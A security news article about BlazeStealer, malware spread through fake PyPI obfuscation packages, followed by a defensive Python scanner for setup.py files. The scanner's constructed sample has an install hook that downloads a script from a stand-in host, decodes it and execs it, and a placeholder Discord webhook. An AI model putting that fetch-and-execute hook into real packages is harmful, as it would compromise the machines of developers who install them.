BlazeStealer Python Malware Allows Complete Takeover of Developer Machines

Published : 23/11/2024   Category : security

Checkmarx researchers warn that BlazeStealer can exfiltrate information, steal passwords, disable PCs, and take over webcams.



Malicious Python packages masquerading as legitimate code obfuscation tools are targeting developers via the PyPI code repository.

Focusing on those interested in code obfuscation is a savvy choice that could offer up organizational crown jewels, according to researchers at Checkmarx, who dubbed the malware BlazeStealer.

They warned on Nov. 8 that BlazeStealer is particularly concerning because it can exfiltrate host data, steal passwords, launch keyloggers, encrypt files, and execute host commands. It becomes even more dangerous thanks to the astute choice of targets, according to Checkmarx threat researcher Yehuda Gelb.

Developers who engage in code obfuscation are likely working with valuable and sensitive information. As a result, hackers see them as valuable targets to pursue and therefore are likely to be the victims targeted in this attack, Gelb explains.

BlazeStealer is the latest in a wave of compromised Python packages attackers have released in 2023. In July, Wiz researchers warned of PyLoose, malware consisting of Python code that loads an XMRig miner directly into a computer's memory using the Linux memfd fileless technique. At the time, Wiz observed nearly 200 instances in which the attackers used it for cryptomining.

For its part, Checkmarx has tracked various malicious Python-based packages, including its September 2023 discovery of culturestreak, which runs a concurrent loop to tie up system resources for unauthorized Dero cryptocurrency mining.

The BlazeStealer payload can extract a malicious script from an external source, giving attackers complete control over the victim's computer. According to Gelb, the malicious BlazeStealer payload activates once it is installed on the compromised system.

For command and control, BlazeStealer runs a bot carried via the Discord messaging service using a unique identifier.

This bot, once activated, effectively provides the attacker full control of the target's system, allowing them to perform a myriad of harmful actions on the victim's machine, Gelb warns. Besides gathering detailed host data, BlazeStealer can download files, deactivate Windows Defender and Task Manager, and lock a computer by overloading the CPU. It does the latter by running a batch script in the startup directory to shut down the computer, or forces a BSOD (blue screen) error with a Python script.

BlazeStealer can also take control of a PC's webcam using a bot that stealthily downloads a .ZIP file from a remote server and installs the freeware application WebCamImageSave.exe.

This allows the bot to secretly capture a photo using the webcam. The resulting image is then sent back to the Discord channel without leaving any evidence of its presence after deleting the downloaded files, Gelb notes.
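One defensive check a practitioner can run over a downloaded package before installing it, as an added example (not Checkmarx's tooling or BlazeStealer's code): a small static scanner for the install-time staging pattern the article describes, where a setup.py hooks the install command, fetches a script from an external source, decodes it and executes it, with a Discord endpoint as a C2 hint. The sample setup.py, its package name and its URLs are constructed placeholders.

```python
import ast
# Callee names worth flagging when they appear in a package's setup.py.
NETWORK_CALLS = {"urlopen", "urlretrieve"}                 # urllib.request fetches
EXEC_CALLS = {"exec", "eval", "system", "Popen", "check_output"}
DECODERS = {"b64decode", "decompress"}                      # unpacking a staged payload

def _tail(expr):
    """Terminal name of an expression: 'urlopen' for urllib.request.urlopen."""
    return getattr(expr, "attr", None) or getattr(expr, "id", "")

def scan_setup_py(source: str) -> list[str]:
    """Return findings for one setup.py source string (standard-library ast only)."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        # A custom install command runs arbitrary code during 'pip install'.
        if isinstance(node, ast.ClassDef):
            for base in node.bases:
                if _tail(base) == "install":
                    findings.append(f"install hook: class {node.name} subclasses install")
        elif isinstance(node, ast.Call):
            name = _tail(node.func)
            if name in NETWORK_CALLS:
                findings.append(f"network fetch: {name}() at line {node.lineno}")
            elif name in EXEC_CALLS:
                findings.append(f"code execution: {name}() at line {node.lineno}")
            elif name in DECODERS:
                findings.append(f"payload decoding: {name}() at line {node.lineno}")
        # Hard-coded Discord endpoints are a C2 hint, as in the BlazeStealer write-up.
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if "discord" in node.value.lower():
                findings.append(f"Discord reference at line {node.lineno}")
    return findings

# Constructed sample mirroring the install-time staging the article describes.
SAMPLE_SETUP_PY = '''\
from setuptools import setup
from setuptools.command.install import install
import urllib.request, base64
C2 = "https://discord.com/api/webhooks/PLACEHOLDER"  # constructed placeholder
class PostInstall(install):
    def run(self):
        install.run(self)
        blob = urllib.request.urlopen("https://example.invalid/stage2").read()
        exec(base64.b64decode(blob))
setup(name="pyobftoolz", version="1.0", cmdclass={"install": PostInstall})
'''
if __name__ == "__main__":
    for finding in scan_setup_py(SAMPLE_SETUP_PY):
        print(finding)
```

A package that trips several of these findings at once is worth unpacking and reading by hand rather than installing, since none of the flagged constructs are needed by an ordinary obfuscation library's setup.py.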
